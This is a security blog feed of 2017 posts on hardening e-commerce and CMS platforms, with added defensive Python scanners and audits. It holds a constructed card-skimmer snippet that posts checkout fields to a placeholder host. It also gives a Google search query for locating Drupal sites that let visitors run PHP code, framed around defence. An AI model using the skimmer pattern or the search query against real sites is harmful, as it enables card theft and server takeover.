siteguarding – Security Blog (Tue, 31 Oct 2017 05:48:11 +0000)

Why Magento Security is Important (Wed, 26 Jul 2017 11:13:54 +0000)
Magento is a content management system developed in the US in 2007 by the well-known company Varien. It is free, open-source software built on the Zend Framework and runs on UNIX-like operating systems. The CMS is primarily suited to building large online stores; more than 100,000 online resources around the world already run on this platform.

Opportunities and features of Magento

From a single Magento installation you can create several web stores and manage them together, which is very convenient for administration. The catalog is well structured and supports product comparison. Flexible pricing, stock additions and gift certificates make the system convenient both for the site administrator and for the buyer, who can choose discounted goods and sort them by certain characteristics.

Additionally, Magento offers good opportunities for search engine optimization: access to the HTML code; the ability to add description and keywords meta tags to each product or category; a custom URL suffix for each product; and an XML sitemap that Magento itself generates for search engines. Magento also provides multi-currency support with currency conversion, a convenient function for customers regardless of the country they are in.

If you want to run your online store on Magento without using ready-made templates, you will need knowledge of HTML markup and CSS styles. In practice, it is best to hire a specialist to work with this CMS.

In addition to the platform itself, free and paid modules are available that extend the functions of the CMS. Free modules should first be checked on a test installation, since many low-quality ones are in circulation. Paid modules usually come with free technical support from their developers.

So, Magento CMS is a solid, high-quality platform that is well suited to creating an online store. In some ways it can be difficult for an inexperienced user, but its capabilities are much wider than those of similar platforms, and if a function is missing from the basic configuration you can add a module: at the moment there are more than four thousand different extensions.

Magento Security

The most common recent use of a hacked Magento site is the installation of a spy script that watches forms and sends the values customers enter to the hacker. In this way the hacker obtains the bank card data with which customers pay for purchases in the store, as well as the cardholder’s personal data: everything the buyer enters while placing an order.

The script is loaded on every page of the store, but it is active only where sensitive data is entered. Usually the addresses of these order pages contain the fragments “onepage”, “checkout” or “onestep”.
The script extracts the data from the form fields (input, select, textarea, checkbox), builds a message from them and sends it to the attacker’s site via AJAX.
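The three traits described above (a check of the page URL for order-page fragments, generic harvesting of form fields, and an outbound AJAX send) can be turned into a simple defensive heuristic for reviewing the JavaScript a store serves. The following is an added example, not code from the post or from Magento; the sample snippets are constructed, and the host names shop.example and collector.invalid are placeholders.

```python
"""Heuristic review of JavaScript for Magento form-skimmer indicators.

Added example (not the post's or Magento's code). It reports whether a JS
source shows the traits the post describes and lists any absolute URLs that
point away from the store's own host. The samples below are constructed.
"""
import re

# Fragments the post names as typical of order pages.
CHECKOUT_FRAGMENTS = ("onepage", "checkout", "onestep")

# Reading the current URL, enumerating form fields generically, sending data.
URL_ACCESS_RE = re.compile(r"location\.(href|pathname)|document\.URL", re.I)
HARVEST_RE = re.compile(
    r"(getElementsByTagName|querySelectorAll)\(\s*['\"][^'\"]*(input|select|textarea)", re.I
)
SEND_RE = re.compile(r"XMLHttpRequest|\.send\(|fetch\(|\.ajax\(|sendBeacon", re.I)
URL_LITERAL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)


def skimmer_indicators(js_source: str, store_host: str) -> dict:
    """Return which traits are present; store_host is the shop's own hostname."""
    lowered = js_source.lower()
    return {
        "checks_checkout_url": bool(URL_ACCESS_RE.search(js_source))
        and any(frag in lowered for frag in CHECKOUT_FRAGMENTS),
        "harvests_form_fields": bool(HARVEST_RE.search(js_source)),
        "sends_via_ajax": bool(SEND_RE.search(js_source)),
        # Hosts other than the store's own: candidate exfiltration endpoints.
        "foreign_hosts": sorted(
            {h for h in URL_LITERAL_RE.findall(js_source) if h.lower() != store_host.lower()}
        ),
    }


def is_suspicious(js_source: str, store_host: str) -> bool:
    """Flag a script only when all three behavioural traits occur together."""
    ind = skimmer_indicators(js_source, store_host)
    return ind["checks_checkout_url"] and ind["harvests_form_fields"] and ind["sends_via_ajax"]


# Constructed sample: URL check + generic field enumeration + XHR to a foreign host.
SUSPICIOUS_SAMPLE = (
    "if (document.URL.indexOf('onepage') > -1 || document.URL.indexOf('checkout') > -1) {"
    " var els = document.getElementsByTagName('input'); /* ... */"
    " var x = new XMLHttpRequest(); x.open('POST', 'https://collector.invalid/c'); }"
)

# Constructed sample: legitimate checkout helper talking only to the store itself.
BENIGN_SAMPLE = (
    "if (location.href.indexOf('checkout') !== -1) {"
    " jQuery.ajax({url: 'https://shop.example/rest/V1/guest-carts/estimate-shipping-methods'}); }"
)

if __name__ == "__main__":
    for name, src in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, is_suspicious(src, "shop.example"), skimmer_indicators(src, "shop.example"))
```

Run it over the scripts referenced by the store's pages (and over JavaScript stored in the database, since the post notes the script is injected into every page); a hit is a reason to diff the file against a clean Magento release, not a verdict by itself.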

To keep Magento secure, install the security patches issued by the vendor promptly.

How to Harden Joomla Security (Wed, 26 Jul 2017 09:42:18 +0000)
A virus is a piece of software; it does not arrive on a site out of thin air. It gets there after a hack, or the site owner (administrator) brings it in with extensions and system templates. Let’s consider the six main points of entry for viruses on a site.

1. Hacking the hosting provider’s server

Any hosting provider’s service is, in fact, a large computer that is also exposed to attacks and infections. Unfortunately, if your sites are located on a service that has been or is being attacked, you can only react after the fact, that is, eliminate the consequences of the hack or attack.

Protection against hacking of the hosting provider’s service can only be preventative.

When choosing a hosting provider, choose only trusted, top-tier services. Note whether the hosting provider uses its own data center or rents one. In reviews of the hosting provider, pay attention to statistics on its downtime and site unavailability.

Site “defenders” have a first “golden” rule: create a separate user account for each domain (site). This is practically impossible on shared hosting (where you are allowed to create 2-20 sites under the same account), but it is quite feasible on VDS servers. Separating sites by account isolates them from each other, so that when one site is infected, the other sites on the server are not infected in the same way.

2. Hacking the site through “holes”, i.e. CMS vulnerabilities

Any content management system (CMS) eventually becomes vulnerable, and CMS Joomla is no exception. That is why it is important for Joomla security to monitor system updates and periodically apply new security releases.

3. Hacking CMS Joomla

The methods of hacking a CMS are as follows:

– Hacking the website and uploading shells and backdoors through various upload forms: photos, media files and other files;
– Introduction of malicious code through spam mailings or through SQL injection;
– Theft of the site administrator’s credentials (SQL injection, XSS attacks, brute force);
– Infection of the website through third-party extensions and templates;
– Downloading extensions and templates from blogs and webmasters’ sites, even the most famous ones, is a direct way to a possible infection of the site. Sometimes such chain-loading of an extension, from user to user, leads to massive infection;
– All kinds of “torrent” trackers offering a free download of a paid extension or template are also not recommended.

4. Hacking the Joomla site with a brute force attack

A brute force attack is guessing the site administrator’s username and password. This loophole is closed by a complex administrator password and by changing the administrator’s name from “admin” to something else.

5. Website hijacking through FTP interception

It is impossible to manage a site without access to its directory over FTP. The FTP protocol is quite exposed, and it would be strange if attackers did not try to use this loophole. To protect yourself, use the SFTP protocol, create a separate FTP account for each site and do not store passwords in the FTP client.

6. Unprofessionalism of hired freelancers

If you do not maintain the site yourself and hire freelancers to change the design or do other work, infection with virus code is possible.

How to harden WP security (Wed, 26 Jul 2017 09:36:48 +0000)
Many have seen reports that yet another site was hacked; perhaps someone has experienced it personally. How can a site be hacked, and what protective measures can be taken? We will talk about what needs to be done to protect your site and not become a victim of hackers.

Hacking a site means getting unauthorized access to the site’s files or to the administration panel of its content management system.

In this article, we will not consider hacking of the hosting on which the site runs, and will focus only on hacking the site itself.

First of all, note that if you do not do anything, then sooner or later the site will be hacked!

The fact is that a modern WordPress site has about 500 thousand lines of code. This code is for the most part open, and anyone can analyze it, including for vulnerabilities. In such a huge array, sooner or later an error will be found, and attackers will want to use it.

A site on a common platform such as WordPress can be recognized by its signature features. By crawling your site against a set of signatures, one can find out many details: the name and version of the platform, which plugins and extensions are installed and their versions, the list of users, and so on.

There are a huge number of online scanners that constantly scan the network in search of sites based on this platform. It is only a matter of time before your site is scanned by one of them.

To make it harder to scan your site, you can install plugins that hide the WordPress version.

Periodic updates are extremely important for WordPress security. Updates not only fix discovered vulnerabilities but can also bring new, improved functionality and better site performance. However, before updating, make a backup copy of the site in case the developers’ update contains an error or something else goes wrong. It is also important to check the site after each update.

A common way to hack a site is to obtain passwords for its administrative panel. How do hackers get passwords? They intercept a password transmitted over the unprotected HTTP protocol, guess it by brute force, or crack it after gaining access to the site database.

The best protection against interception is to use the secure HTTPS protocol instead of HTTP: the entire site, or at least its administrative panel, should be accessible only over HTTPS. This requires an SSL certificate. Certificates issued by a certificate authority cost money and have a finite period of validity.

A brute force attack is a very common method of attacking WordPress sites on the network. Of course, no one guesses passwords manually; there are special programs for that.

To protect against it, set a password on the wp-admin folder, change the address of the administrative login page, protect the login and forgotten-password pages, disable the error message for a wrong password, and prohibit enumeration of all users.
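Besides the hardening steps above, brute forcing of the login page is easy to spot in the web server log: one client sending many POST requests to wp-login.php in a short time. The following detector is an added example, not code from the post or from WordPress; the access log lines it runs over are constructed, in Apache “combined” format, with placeholder IP addresses.

```python
"""Detect password brute-forcing against wp-login.php in a web server log.

Added example (not the post's or WordPress code). It parses Apache/nginx
"combined" log lines, counts POSTs to wp-login.php per client inside a sliding
time window and reports clients that exceed a threshold. Log lines below are
constructed for illustration.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line: str):
    """Return the fields we need from one combined-format log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TIME_FMT),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def find_bruteforce(lines, threshold=5, window=timedelta(minutes=1)):
    """Return {ip: peak count} for clients with more than `threshold`
    login POSTs inside any `window`-long interval."""
    recent = defaultdict(deque)  # ip -> timestamps of recent login POSTs
    offenders = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or not rec["path"].startswith("/wp-login.php"):
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while q and rec["ts"] - q[0] > window:  # drop entries outside the window
            q.popleft()
        if len(q) > threshold:
            offenders[rec["ip"]] = max(offenders.get(rec["ip"], 0), len(q))
    return offenders


# Constructed log: 8 login POSTs in 35 seconds from one client, plus a normal login.
SAMPLE_LOG = [
    f'203.0.113.5 - - [26/Jul/2017:09:40:{sec:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 3412 "-" "python-requests/2.18"'
    for sec in range(0, 40, 5)
] + [
    '198.51.100.7 - - [26/Jul/2017:09:40:12 +0000] "GET /wp-login.php HTTP/1.1" 200 2811 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [26/Jul/2017:09:40:25 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [26/Jul/2017:09:40:26 +0000] "GET /wp-admin/ HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(find_bruteforce(SAMPLE_LOG))
```

A 302 after a POST is normally a successful login, so a client that produces 200s for a long run and then a single 302 is the pattern worth alerting on; the threshold and window should be tuned to the site’s real traffic before the output is wired to a block list.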

Unfortunately, you will not be able to completely secure your site from hacking: you need to close all possible loopholes, while the attacker needs to find only one. However, do not be discouraged. If you follow the security rules, hacking your site will be extremely difficult and time-consuming.

How to Secure OpenCart CMS (Tue, 25 Jul 2017 11:13:25 +0000)
OpenCart, like some other CMS, can be called a relatively secure platform. However, as with other content management systems, it is better to take care of the security of your site against unauthorized access right away. In this article we give basic tips that will help you improve the OpenCart security of your site. The article is primarily for those who run their own online stores on OpenCart, but the tips are quite universal, so they will also interest owners of sites on other CMS.

1. Hiding the login to the administrative panel

By default, the admin panel is entered at your_site/admin. Naturally, the more information hackers have, the easier it is for them to hack your site. Therefore, the first recommendation is to change the admin panel address from /admin to something else: /manager, /panel or something even less guessable.

How to do it: in the file manager or in phpMyAdmin, first rename the “admin” folder to something else; second, make the same replacement in the “config.php” file inside the renamed folder; third, sometimes you also need to change the “config.php” file in the root folder (check whether “admin” is mentioned there).

2. Change the administrator’s login and password

After changing the panel address, it is worth changing the login, which by default is also “admin”. Note that this is the main default login used on many CMS, so even if your store or site is not on OpenCart, I still advise changing it immediately.

How to do it: go to the admin panel, select “System”, then “Users”, then “Users” again. Find the row with the login “admin”, open its settings and change the login to another.

Right there you can also change the password; I strongly recommend doing so, creating a password no shorter than ten characters. If you cannot come up with one yourself, use one of the online password generators that are easy to find in Google.

3. Change access rights for important files

Two files, namely config.php in the root folder and config.php in the folder that is called admin by default (and that was renamed above), contain important information about the database connection, so it is recommended to change the permissions for these files to read-only.

How to do it: you can change the permissions with any tool you use to work with files. The easiest way is to change them directly in the hosting control panel.
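The two file-level steps above (the renamed admin folder must no longer be referenced as /admin/ in either config.php, and both config.php files must be read-only) can be checked and applied from a shell account on the server. The script below is an added example, not OpenCart’s code or the post’s; it assumes a store layout with config.php in the root and in the renamed admin folder, and the define('HTTP_SERVER', …) / define('DIR_APPLICATION', …) lines it writes into its constructed demo tree are a hypothetical stand-in for a real config.php.

```python
"""Audit and harden the two OpenCart config.php files described above.

Added example (not OpenCart's or the post's code). Findings: a config.php
that is writable, or that still refers to the default "/admin/" path after
the admin folder was renamed. The demo tree is constructed in a temp dir.
"""
import pathlib
import re
import stat
import tempfile

ADMIN_REF_RE = re.compile(r"['\"][^'\"]*/admin/[^'\"]*['\"]")
WRITE_BITS = stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH


def audit_config(path: pathlib.Path) -> list:
    """Return a list of findings for one config.php (empty when it passes)."""
    findings = []
    if not path.is_file():
        return [f"{path}: missing"]
    mode = path.stat().st_mode
    if mode & WRITE_BITS:
        findings.append(f"{path}: writable ({stat.filemode(mode)}), expected read-only")
    for lineno, line in enumerate(path.read_text(encoding="utf-8", errors="replace").splitlines(), 1):
        if ADMIN_REF_RE.search(line):
            findings.append(f"{path}:{lineno}: still refers to the default /admin/ path")
    return findings


def config_files(root, admin_dir):
    root = pathlib.Path(root)
    return (root / "config.php", root / admin_dir / "config.php")


def audit_store(root, admin_dir) -> list:
    return [f for p in config_files(root, admin_dir) for f in audit_config(p)]


def harden_store(root, admin_dir) -> None:
    """Rewrite lingering /admin/ references to the new folder name, then make
    both files read-only (0440: owner and group may read, nobody may write)."""
    for p in config_files(root, admin_dir):
        p.write_text(p.read_text(encoding="utf-8").replace("/admin/", f"/{admin_dir}/"), encoding="utf-8")
        p.chmod(stat.S_IRUSR | stat.S_IRGRP)


def build_demo_store() -> pathlib.Path:
    """Constructed tree: folder already renamed to 'panel', but its config.php
    still points at /admin/ and both files are writable (the usual half-done state)."""
    root = pathlib.Path(tempfile.mkdtemp())
    (root / "panel").mkdir()
    (root / "config.php").write_text(
        "<?php\ndefine('HTTP_SERVER', 'http://shop.example/');\n"
        f"define('DIR_APPLICATION', '{root}/catalog/');\n"
    )
    (root / "panel" / "config.php").write_text(
        "<?php\ndefine('HTTP_SERVER', 'http://shop.example/admin/');\n"
        f"define('DIR_APPLICATION', '{root}/admin/');\n"
    )
    return root


if __name__ == "__main__":
    demo = build_demo_store()
    print("\n".join(audit_store(demo, "panel")) or "clean")
    harden_store(demo, "panel")
    print(audit_store(demo, "panel") or "clean after hardening")
```

Run the audit against the real store root with the real folder name instead of the demo tree; the PHP process only needs read access to these files, so 0440 (with the web server in the file’s group) does not break the store.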

4. Do not display errors

As a rule, when hacking websites, hackers use various loopholes, and the error messages displayed on wrong actions are often very helpful to them. Therefore, I recommend turning off the display of these errors.

Here you will most likely ask: what if you need to look at the errors? For that you can use the error log file (its name is set in the same block of the settings).

You can view it by going to the root folder of the site, then into system and then into logs.

How to do it: go to the admin panel, open “System”, then “Settings”; in the settings open the “Server” tab, at the bottom there is the “Errors” block, and there set “Show errors” to “No”.

How to Protect osCommerce CMS from Hackers (Tue, 25 Jul 2017 10:35:50 +0000)
OsCommerce is one of the most popular content management systems for online stores. Its main advantages are a wide variety of modules and functionality that allow you to create a store of any complexity and structure. However, it requires a certain professionalism.

OsCommerce is a free open-source CMS that can be downloaded from the official portal of the system, where the necessary modules and add-ons are also available. Help and support can always be obtained in the osCommerce community, whose members, incidentally, have contributed a significant number of additional functions to the system.

So today we will talk about osCommerce security for online stores and safe behaviour on the Internet.

Hacking an online store is dangerous for both sides: the shop owner and the customers. From a hacked store, attackers steal confidential information: customer contacts, bank card numbers and other valuable data. Hackers can also break the store completely. As a result, the seller loses reputation, and buyers lose their privacy.

There are many ways to protect your online store from hacking. In this article we will talk about the most accessible ones.

1. Encrypt the connection

Connect an SSL certificate to the server of your online store to enable a secure connection between the buyer’s browser and the store. Such a connection is almost impossible to break. Therefore, an SSL connection is a must-have for any site that processes customers’ personal data.

2. Timely updates

Hackers are constantly finding new vulnerabilities in programs: the operating system, the browser, the CMS. You need to close these security holes quickly with updates.

3. Two-step authorization

Two-step authorization is one of the most reliable ways to protect against hacking, which is why Internet banks use it.

After entering the login and password, you receive a message on your phone with an access code. Logging into the site is possible only by entering this code in a special field on the authorization page. Even if an attacker obtains your password, he cannot enter the site without your mobile phone.
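The server side of the flow just described (issue a code, deliver it to the phone, accept it once within a short time, and stop guessing) is small enough to show in full. The following is an added example, not osCommerce code or the post’s; SMS delivery is delegated to a caller-supplied function (here a constructed stub), and the class name, time-to-live and attempt limit are choices of this example.

```python
"""Second login step with a one-time code sent to the user's phone.

Added example (not osCommerce's or the post's code). Design points: the server
stores only an HMAC of the code, the code expires after CODE_TTL_SECONDS,
is valid exactly once, allows MAX_ATTEMPTS guesses, and is compared in
constant time. Delivery is a caller-supplied send_sms(phone, text) function.
"""
import hashlib
import hmac
import secrets
import time

CODE_TTL_SECONDS = 300  # five minutes, as commonly used for SMS codes
MAX_ATTEMPTS = 3        # wrong guesses before the code is invalidated


class SecondFactor:
    def __init__(self, send_sms, clock=time.time):
        self._send_sms = send_sms
        self._clock = clock                      # injectable for testing
        self._key = secrets.token_bytes(32)      # per-process key for the code HMAC
        self._pending = {}                       # username -> (mac, expires_at, attempts_left)

    def _mac(self, code: str) -> str:
        return hmac.new(self._key, code.encode(), hashlib.sha256).hexdigest()

    def issue(self, username: str, phone: str) -> None:
        """Called after the password check succeeded: mint and send a code."""
        code = f"{secrets.randbelow(10**6):06d}"
        self._pending[username] = (self._mac(code), self._clock() + CODE_TTL_SECONDS, MAX_ATTEMPTS)
        self._send_sms(phone, f"Your login code is {code}")

    def verify(self, username: str, submitted: str) -> bool:
        """Second step of the login; True completes the login."""
        entry = self._pending.get(username)
        if entry is None:
            return False
        mac, expires_at, attempts_left = entry
        if self._clock() > expires_at or attempts_left <= 0:
            del self._pending[username]
            return False
        if hmac.compare_digest(mac, self._mac(submitted)):
            del self._pending[username]          # single use
            return True
        attempts_left -= 1
        if attempts_left == 0:                   # too many guesses: force a fresh code
            del self._pending[username]
        else:
            self._pending[username] = (mac, expires_at, attempts_left)
        return False


if __name__ == "__main__":
    outbox = []                                  # constructed stand-in for an SMS gateway
    sf = SecondFactor(lambda phone, text: outbox.append((phone, text)))
    sf.issue("alice", "+1-555-0100")             # placeholder number
    print(outbox[-1])
    print(sf.verify("alice", outbox[-1][1].split()[-1]))
```

The attempt limit is what protects a six-digit code, not its secrecy in storage; a real deployment would also rate-limit issue() per user so that the SMS gateway cannot be used to flood a phone.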

4. Using Password Managers

For osCommerce security, use complex passwords that are unique to each resource. In order not to keep all passwords in your head or on a piece of paper under the keyboard, use a password manager. It will generate reliable passwords for you and store them. Access to the passwords in the manager is possible only with a master password, so you only need to remember that one.

5. Protect devices

All previous methods protect you against remote hacking. But you can run into a completely desperate attacker who will try to get at your devices.

Imagine that an attacker has access to the computer from which you manage the site, and the browser is configured to auto-fill passwords. Access is then already in his hands.

To protect devices, set up encryption. The easiest way is to set an administrator password for logging into the computer and a lock screen on the mobile device.

But it is better to use advanced encryption; different devices have different methods.

These methods are just the tip of the security iceberg. So start using them now if you are not already.

How to Hack Website on Drupal CMS (Tue, 25 Jul 2017 10:23:28 +0000)

Drupal is one of the most famous and popular open-source CMS in PHP. The CMS itself is built with the right approach and with an eye to security guidelines. Architecturally, CMS Drupal is a very secure system, security fixes for the kernel and modules come out quickly, and hacking it through holes is not so easy.

Drupal is reliable in itself. Only the use of unverified modules, programmer errors when creating your own modules for the site, server configuration errors, or non-compliance with Drupal security basics can be the reason for a hack.

By the way, the Drupal Security team quite often issues security advisories with a critical severity level. So Drupal is safe only until a new version comes out, in which the fixed vulnerability is revealed to all hackers. Sites on Drupal that are not updated immediately after a security release are often attacked.

As with other CMS, most vulnerabilities come from various plugins, themes and other custom functions. It is most convenient to have a tool that shows the versions of Drupal and its components; knowing them, you can search for known vulnerabilities.

Usually, vulnerabilities are detected by bots: programs written by hackers to search Internet sites on different CMS. Bots perform basic actions, for example trying to register or to enter the admin area with the password 11111, and other more complex actions. If the site does have a vulnerability, the bot exploits it and sends information to the hacker’s database of broken sites; the attacker can then perform illegal actions if your site is profitable, for example has high traffic.

But now we will talk about a vulnerability of another kind, namely the carelessness, oversights and disorder of those web developers who give access to the “PHP Code” input format to anonymous and other users. It allows anyone to run arbitrary PHP code without having access to the site admin area. All Drupal security guides say to be careful with the built-in “PHP Code” module and not to give access to it to strangers, still less to unauthenticated visitors. But, as we will see, these requirements are often neglected…

All-powerful Google will help us find vulnerable sites running on Drupal. Its search operators allow you to find sites by many very interesting parameters. We will look for indexed material editing pages where one (or the only) input filter is “PHP code”.

Search algorithm:
1. The page URL must contain “node” and “edit”;
2. The page text must mention the phrase “You may post PHP code”.

The “inurl” operator, which finds sites containing certain words in the URL, helps here; in our case the words are “node” and “edit”.

A search for these criteria is performed by the line: inurl:node inurl:edit “You may post PHP code”

Next you will see a list of vulnerable sites running on Drupal. Obviously, many of them have already been used by spammers.

What can be done with such a site? Upload a shell, spam the site, scan the server.

How to protect yourself from this? Disable the “PHP Code” module. If that is not possible at all, then restrict the rights to it to a minimum of people, preferably only the chief administrator.
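Whether a site is in the state described above can be checked on the server itself rather than through a search engine: the grant that matters is a role’s permission to use the “PHP code” text format. The script below is an added example, not Drupal code or the post’s. It assumes the Drupal 7 schema (tables role(rid, name) and role_permission(rid, permission, module)), the permission strings “use text format php_code” and “use PHP for settings” used by the PHP filter module, and the reserved role IDs 1 (anonymous) and 2 (authenticated); the data it queries here is a constructed in-memory SQLite copy, and against a real site the same SQL would be run on the site’s database.

```python
"""Find roles allowed to use the "PHP code" text format (Drupal 7 layout).

Added example (not Drupal's or the post's code). Assumes Drupal 7's role and
role_permission tables, the permission names of the PHP filter module and the
reserved rids 1 (anonymous) and 2 (authenticated). Data below is constructed.
"""
import sqlite3

RISKY_PERMISSIONS = ("use text format php_code", "use PHP for settings")
BUILTIN_ROLES = {1: "anonymous user", 2: "authenticated user"}  # every visitor / every account

AUDIT_SQL = """
SELECT r.rid, r.name, p.permission
FROM role_permission p JOIN role r ON r.rid = p.rid
WHERE p.permission IN (?, ?)
ORDER BY r.rid, p.permission
"""


def find_php_grants(conn: sqlite3.Connection) -> list:
    """Every role holding a PHP-execution permission; grants to the built-in
    anonymous/authenticated roles are the case the post warns about."""
    rows = conn.execute(AUDIT_SQL, RISKY_PERMISSIONS).fetchall()
    return [
        {"rid": rid, "role": name, "permission": perm,
         "severity": "critical" if rid in BUILTIN_ROLES else "review"}
        for rid, name, perm in rows
    ]


def revoke_php_grants(conn: sqlite3.Connection, keep_rids) -> int:
    """Remove the PHP permissions from every role except keep_rids
    (normally just the administrator role). Returns rows deleted."""
    placeholders = ",".join("?" * len(keep_rids))
    cur = conn.execute(
        f"DELETE FROM role_permission WHERE permission IN (?, ?) AND rid NOT IN ({placeholders})",
        RISKY_PERMISSIONS + tuple(keep_rids),
    )
    conn.commit()
    return cur.rowcount


def build_demo_db() -> sqlite3.Connection:
    """Constructed site: authenticated users were given the PHP code format."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE role (rid INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE role_permission (rid INTEGER, permission TEXT, module TEXT);
        INSERT INTO role VALUES (1,'anonymous user'),(2,'authenticated user'),
                                (3,'administrator'),(4,'editor');
        INSERT INTO role_permission VALUES
            (1,'access content','node'),
            (2,'use text format php_code','filter'),
            (3,'use text format php_code','filter'),
            (3,'use PHP for settings','php'),
            (4,'use text format filtered_html','filter');
    """)
    return conn


if __name__ == "__main__":
    db = build_demo_db()
    for g in find_php_grants(db):
        print(g)
    print("revoked:", revoke_php_grants(db, keep_rids=[3]))
    print(find_php_grants(db))
```

Clearing Drupal’s cache after such a change is needed for the new permissions to take effect, and disabling the PHP filter module altogether (the post’s first recommendation) removes the format and its permission entirely.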

So don’t commit such nonsense, keep your kernel and modules up to date, and your site will be safe!